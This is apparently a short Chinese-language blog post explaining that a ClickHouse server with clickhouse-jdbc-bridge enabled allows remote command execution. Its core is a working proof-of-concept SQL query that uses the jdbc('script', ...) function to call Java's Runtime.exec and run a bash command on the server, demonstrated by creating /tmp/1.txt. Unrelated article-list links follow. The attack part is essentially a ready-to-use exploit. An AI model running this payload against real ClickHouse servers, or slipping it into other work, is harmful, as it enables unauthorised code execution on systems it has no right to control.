clickhouse-jdbc-bridge rce

clickhouse-jdbc-bridge 是什么

JDBC bridge for ClickHouse®. It acts as a stateless proxy passing queries from ClickHouse to external datasources. With this extension, you can run distributed query on ClickHouse across multiple datasources in real time, which in a way simplifies the process of building data pipelines for data warehousing, monitoring and integrity check etc.
简单来说是clickhouse服务端的一个组件 功能是用来创建新的jdbc连接
https://github.com/ClickHouse/clickhouse-jdbc-bridge

RCE

当我们连接到clickhouse的时候,如果服务端支持clickhouse-jdbc-bridge
那么可以输入以下命令RCE

SELECT *
FROM jdbc('script', 's=[3];s[0]="/bin/bash";s[1]="-c";s[2]="touch /tmp/1.txt";java.lang.Runtime.getRuntime().exec(s);')

在这里插入图片描述
然后可以在服务器端/tmp目录下看到1.txt

相关推荐

  1. ClickHouse(17)ClickHouse集成JDBC表引擎详细解析

    2024-07-09 17:06:09       40 阅读
  2. JDBC*

    2024-07-09 17:06:09       32 阅读
  3. Hive <span style='color:red;'>JDBC</span>

    Hive JDBC

    2024-07-09 17:06:09      34 阅读

最近更新

  1. MySQL

    MySQL

    2024-07-09 17:06:09      0 阅读
  2. C++中的atomic:原子

    2024-07-09 17:06:09       0 阅读
  3. Nacos 面试题及答案整理,最新面试题

    2024-07-09 17:06:09       0 阅读
  4. 【Unity】RPG2D龙城纷争(十五)特殊加成型要诀

    2024-07-09 17:06:09       0 阅读
  5. ETCD介绍以及Go语言中使用ETCD详解

    2024-07-09 17:06:09       0 阅读
  6. C语言:再探C语言指针

    2024-07-09 17:06:09       0 阅读

热门阅读

  1. 牛客周赛 Round 50

    2024-07-09 17:06:09       13 阅读
  2. 量化机器人如何提高投资效率?

    2024-07-09 17:06:09       5 阅读
  3. Emacs相关

    2024-07-09 17:06:09       8 阅读
  4. 细水长流:SKlearn中模型的增量训练实践

    2024-07-09 17:06:09       10 阅读
  5. 论如何搭建属于自己的服务器?

    2024-07-09 17:06:09       8 阅读
  6. RabbitMQ实现延迟消息

    2024-07-09 17:06:09       12 阅读
  7. 【数据挖掘】银行信用卡风险大数据分析与挖掘

    2024-07-09 17:06:09       8 阅读
  8. emacs 重新加载磁盘上的文件

    2024-07-09 17:06:09       8 阅读
  9. Linux学习笔记(一)

    2024-07-09 17:06:09       9 阅读
  10. 用WPF实现的窗体是怎么运行的?

    2024-07-09 17:06:09       11 阅读